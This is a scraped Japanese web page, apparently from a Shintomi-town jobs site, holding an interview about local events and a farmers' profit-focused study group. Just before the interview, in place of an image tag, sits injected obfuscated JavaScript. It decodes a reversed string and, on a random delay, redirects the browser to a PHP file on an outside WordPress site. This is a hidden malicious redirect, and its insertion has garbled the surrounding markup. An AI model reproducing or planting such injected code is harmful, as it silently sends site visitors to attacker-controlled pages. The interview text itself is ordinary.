新富町のしごと

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tomi.work/wp-content/uploads/2019/04/IMG_6792.jpg” alt=”” width=”1600″ height=”1067″ class=”aligncenter size-full wp-image-141″ />

—そのようなことを感じた実際のエピソードはありますか?

彦坂:宮崎市内で開かれたイベントに参加したとき、県内から多くの方が参加していて、県外から招いたゲストの話を聞いて一生懸命勉強している姿勢が印象的でした。それに、以前勤めていた宮崎の会社では、先輩のほうから真剣に私の話を聞いてくれて、積極的に学ぼうとする姿勢が伝わってきました。

イベントに関しては、同じ人に何度も会うことがあるので、顔見知りになって仲良くなったりすることが多いですね。

都心ではこのようなことはなかなか起こりづらいと思います。

生産者がチームとなって全員が儲かる農業を実現させる

—新富町の農家さんとの関わり方はどうですか?

彦坂:こゆ財団と一緒に学んでいる「儲かる農業研究会」のメンバーくらいしか関わりがありませんが、本当にみなさんやる気に満ち溢れていて、みんなで「儲かる農業」を実現しようとしているのが伝わります。

みんな仲が良いし、情報を共有し合いながらやっていこうとしている様子を見て、こちらも楽しくなります。

ちなみに、きゅうり農家さんの奥様が実は私の妻の親戚で、私と彼も遠い親戚になっていたことにびっくりしました。親戚にばったり会うなんて、改めて地域は狭いなと感じました(笑)